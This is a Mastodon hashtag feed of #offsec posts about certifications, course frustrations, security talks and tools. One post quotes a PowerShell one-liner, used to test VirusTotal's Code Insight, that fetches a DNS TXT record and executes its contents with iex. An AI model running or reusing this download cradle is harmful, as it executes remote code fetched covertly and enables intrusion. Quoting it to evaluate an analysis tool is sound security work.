Writing Exchange

0 posts0 participants0 posts today

nemo™ 🇺🇦The <a href="https://mas.to/tags/Offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Offsec</a> <a href="https://mas.to/tags/OSCP" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#OSCP</a> song Try <a href="https://mas.to/tags/Harder" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Harder</a><a href="https://youtu.be/t-bgRQfeW64" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://youtu.be/t-bgRQfeW64</a> <a href="https://mas.to/tags/nemoradio" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#nemoradio</a>

Shawn WebbCool research by my coworkers at IOActive: <a href="https://www.wired.com/story/digital-license-plate-jailbreak-hack/" rel="nofollow noopener noreferrer" target="_blank">https://www.wired.com/story/digital-license-plate-jailbreak-hack/</a><a href="https://bsd.network/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://bsd.network/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a>

JarrodReally happy with what I accomplished this year. Tackled the OSCP, OSWP, and finished my first HackTheBox Pro Lab Dante. Looking forward to what I accomplish in 2025. <a href="https://infosec.exchange/tags/ethicalhacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#ethicalhacking</a> <a href="https://infosec.exchange/tags/HackTheBox" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HackTheBox</a> <a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#CyberSecurity</a> <a href="https://infosec.exchange/tags/OffSec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#OffSec</a>

Shawn WebbI'm doing a security code review of a service that uses Smithy ( <a href="https://smithy.io/2.0/quickstart.html" rel="nofollow noopener noreferrer" target="_blank">https://smithy.io/2.0/quickstart.html</a> ).This is the first time I've come across Smithy. Does anyone know of any security issues of Smithy models/code that I should be aware of?<a href="https://bsd.network/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://bsd.network/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a> <a href="https://bsd.network/tags/pentest" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#pentest</a> <a href="https://bsd.network/tags/codereview" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#codereview</a>

Florianbeen working through <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a>'s <a href="https://infosec.exchange/tags/pen200" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#pen200</a> as of late and I'm honestly a little appalled about how ...bad it is? Don't get me wrong, the approach is pretty good. I like how we read text/watch video, and then get to do the commands in a more practical fashion. ANd I'd even say some of the labs are actually pretty fun/educational. But the text! :-O "XYZ can be helpful to pen test. We can use netcat. We can also use this script in random_programming_language_you_may_not_even_remotely_know" Question: Use this tool we haven't at all mentioned so far to do a tangentially related thing to the thing you just learned". I get that they are going for the whole " Try Harder" approach where you just have to go look things up and go the extra mile but there is a point where you go from " Let thet student do some extra work" to " Structure? What is structure? I can't be f*cked to make this flow well and make it make sense, let's just shove it in the Try Harder category". Don't get me wrong, I'm not complaining because I'm stuck or whatever, I just feel this could have been done SO MUCH BETTER <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a>

Lucid.H3X<a href="https://defcon.social/tags/introduction" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#introduction</a> Hi My name is Lucid.H3X im a Infosec nut! I love all things security and tech. My main interests are in WIFI and Cloud based Security as well AI since its the New cutting edge of the cyberworld not to mention I have a huge fascination for malware and how its made and works as well. I also enjoy playing old retro 8bit games It's kinda a problem. When I'm not studying for a cert or in some rabbit hole hacking and tinkering. You can find me most likely out and about at local furry meets or hanging out with my family. FOSS and Crypto supporter ❣️If you love <a href="https://defcon.social/tags/wardriving" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#wardriving</a> <a href="https://defcon.social/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#cybersecurity</a> <a href="https://defcon.social/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://defcon.social/tags/furry" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#furry</a> <a href="https://defcon.social/tags/retrogames" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#retrogames</a> <a href="https://defcon.social/tags/retrogaming" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#retrogaming</a> and all things <a href="https://defcon.social/tags/tech" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#tech</a> and <a href="https://defcon.social/tags/privacy" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#privacy</a> <a href="https://defcon.social/tags/hacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#hacking</a> <a href="https://defcon.social/tags/osint" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#osint</a> <a href="https://defcon.social/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a> related then add me!PS I'm a pretty big dork and tend to go on huge rants so be warned ahead of time nerds!Stay Fluffy and Nerdy,Lucid.H3X

BSidesNYC<a href="https://infosec.exchange/@BSidesNYC" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@BSidesNYC</a> 0x03 Recap: In this session, François Proulx discusses what goes on behind the scenes of <a href="https://infosec.exchange/tags/supplychainattacks" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#supplychainattacks</a> through the lens of SLSA (Supply chain Levels for Software Artifacts), a threat model designed to tackle these emergent threats.<a href="https://www.youtube.com/watch?v=gpqLgEqp_jA" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://www.youtube.com/watch?v=gpqLgEqp_jA</a><a href="https://infosec.exchange/tags/securityconference" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#securityconference</a> <a href="https://infosec.exchange/tags/learncybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#learncybersecurity</a> <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a>

al3xso, <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a> friends: i’m looking at an active credential harvesting website found from phishing emails and i wanna make sure i’m not missing anything. any suggestions on directory discovery tools that are possibly not too noisy? what are people’s thoughts on dirhunt?

Shawn WebbIt even works with processes that have entered Capabilities Mode.<a href="https://bsd.network/tags/FreeBSD" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#FreeBSD</a> <a href="https://bsd.network/tags/Capsicum" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Capsicum</a> <a href="https://bsd.network/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://bsd.network/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a> <a href="https://bsd.network/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#malware</a>

Thomas Dang :verified:48hrs, delivery meals for two days, and a little less sleep than I would have liked but pleased to share I am OSEP certified. The course prepared me with the knowledge I needed, combined with using Sliver as my C2, this was a hard exam but I learned a lot during the course. <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#cybersecurity</a> <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a> <a href="https://infosec.exchange/tags/OSEP" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#OSEP</a>

Christopher Bauer :debian: :i3wm: :blobcatthinkingglare:Using Discord as a repository of knowledge/service desk makes life so much more challenging. I know its been said around here before. I just spent hour sifting through, and trying to piece together, fragments of conversations on potato exploits in a challenge in offsec's PEN-200 course. I gradually realized everyone else was as in the dark as I was; they'd only globed onto the potato exploits by the fragments of others, and so it will go for those after me.:blobcatgooglycry: Its potato exploits all the way down.Blurg. <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a>

FlorianSO ... to illustrate how big the gap is between <a href="https://infosec.exchange/tags/Windows" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Windows</a> and <a href="https://infosec.exchange/tags/Linux" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#Linux</a> <a href="https://infosec.exchange/tags/accessibility" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#accessibility</a> where GUI is concerned, I am working on going through the <a href="https://infosec.exchange/tags/offSec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offSec</a> <a href="https://infosec.exchange/tags/OSCP" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#OSCP</a> material and they only allow a single connection to their VPN at a time. You need to start exeercise and lab VMS from WITHIN the VPN in order to have it be reachable from within the VPN. If you do it outside the VPN, you have to work using their browser-based <a href="https://infosec.exchange/tags/kali" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#kali</a> box, which is inaccessible or <a href="https://infosec.exchange/tags/screenReader" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#screenReader</a> users. Starting the exercises from Firefox on the Kali guest proved problematic, so in the end I had to set my VM's networking to NAT and use ssh -L to forward reverse shells down the pipeline in order to not have to constantly swap the VPN between Windows and kali. Is it any wonder we don't have <a href="https://infosec.exchange/tags/screenreader" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#screenreader</a> users in <a href="https://infosec.exchange/tags/infoSec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infoSec</a> with all these barriers, on top of all the <a href="https://infosec.exchange/tags/atekeeping" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#atekeeping</a> that is already happening in the industry? Blog post material, perhaps ... 🤔

vpzIt's been a few years in the making but today I achieved the OffSec Certified Expert 3 (OSCE3) certification after getting OSCP, OSEP, OSWE, and OSED. Took a lot of hours on top of work and family to make this happen. Very happy with the journey and the closure of this chapter. Next year will start fresh with a new big, scary goal and start that journey. But today I'm going to celebrate. <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a>

averagesecurityguyIt's been about a week since this happened so I'm probably cool-headed enough to talk about it. First a little background info.A sales person from Offensive Security (<a href="https://www.offsec.com/" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://www.offsec.com/</a>) has been trying to reach out to me for days. First by work email, which I ignored, then through my personal LinkedIn account, which I also ignored.Then, last week, my son texts me and says, "some guy called me looking for you." I told him I was your son and he said he would try to email. I know that absolutely no one in my professional circle has my son's personal cell number, so I asked him to send me the number that called him.I call the number back and it's the sales guy from Offensive Security. I immediately asked him how he got my son's number and found out it was part of a ZoomInfo (<a href="https://www.zoominfo.com/" rel="nofollow noopener noreferrer" translate="no" target="_blank">https://www.zoominfo.com/</a>) record for me. I told him to immediately delete any record he has with my son's information.I then let him know in no uncertain terms that his company was using some shady data gathering practices if they had my son's cell number and because of that I will personally never do business with OffSec again. I also made it clear that he should never reach out to me again.Even though I hold the <a href="https://infosec.exchange/tags/OSCP" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#OSCP</a> and <a href="https://infosec.exchange/tags/OSCE" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#OSCE</a> certifications and even though they were a career changer for me and for my colleagues, I will no longer do business with their company.<a href="https://infosec.exchange/tags/OffSec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#OffSec</a> <a href="https://infosec.exchange/tags/OffensiveSecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#OffensiveSecurity</a>

0xor0neNice blog post for understanding Sliver C2 internals (from a threat hunter prospective)<a href="https://immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/" rel="nofollow noopener noreferrer" target="_blank">https://immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/</a><a href="https://infosec.exchange/tags/sliver" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#sliver</a> <a href="https://infosec.exchange/tags/redteam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#redteam</a> <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a> <a href="https://infosec.exchange/tags/secops" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#secops</a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#cybersecurity</a>

StillThe Code Insight feature @virustotal@twitter.com launched is... something I guess? It unfortunately still fails to grasp various basic cmdlets from PowerShell and gives misleading results. I fed it a simple <code>(resolve-dnsname stillu.cc -type txt|?{$_.strings-match'get'}).strings |iex</code> and it spat out... whatever this is.<a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a>

Shawn WebbI just finished the introductory article on my new offensive security project, aptly named Offensive-OpenSSL:<a href="https://git.hardenedbsd.org/shawn.webb/articles/-/blob/master/infosec/offensive-openssl/2023-02-03_introduction/article.md" rel="nofollow noopener noreferrer" target="_blank">https://git.hardenedbsd.org/shawn.webb/articles/-/blob/master/infosec/offensive-openssl/2023-02-03_introduction/article.md</a><a href="https://bsd.network/tags/OpenSSL" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#OpenSSL</a> <a href="https://bsd.network/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://bsd.network/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a> <a href="https://bsd.network/tags/HardenedBSD" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#HardenedBSD</a>

alexiaI am proud of myself because today I got my first root shell on a prod network! :blobfoxcomputerowonotice:Some of you may remember back when I only dreamed of hacking for my day job. Many people supported me in various ways like by being welcoming and helpful, providing mentorship, and boosting my work/words. <a href="https://hachyderm.io/tags/InfosecTwitter" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#InfosecTwitter</a> (RIP) was a huge part of my journey. <a href="https://hachyderm.io/tags/hacking" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#hacking</a> <a href="https://hachyderm.io/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://hachyderm.io/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a>

Chase :loading:Always interesting to see blue teamers write up <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a> tools I’ve written. I like how they spent time figuring our TCP packets out to write a snort rule. <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosec</a> <a href="https://infosec.exchange/tags/security" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#security</a> <a href="https://infosec.exchange/tags/pentesting" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#pentesting</a> <a href="https://infosec.exchange/tags/blueteam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#blueteam</a> <a href="https://infosec.exchange/tags/redteam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#redteam</a> <a href="https://www.trendmicro.com/en_us/research/22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html" rel="nofollow noopener noreferrer" target="_blank">https://www.trendmicro.com/en_us/research/22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html</a>

Bishop FoxJust a few weeks until <a href="https://infosec.exchange/@cactuscon" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@cactuscon</a> 11! We can't wait; <a href="https://infosec.exchange/@dnsprincess" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@dnsprincess</a> is presenting, there will be plenty of 🦊 swag on hand, and you can chat with our team about <a href="https://infosec.exchange/tags/infosecjobs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#infosecjobs</a> at Bishop Fox or our industry-leading <a href="https://infosec.exchange/tags/offsec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#offsec</a> solutions. <a href="https://bishopfox.com/events/cactuscon-11" rel="nofollow noopener noreferrer" target="_blank">https://bishopfox.com/events/cactuscon-11</a>

Recent searches

Search options

Administered by:

Server stats:

#offsec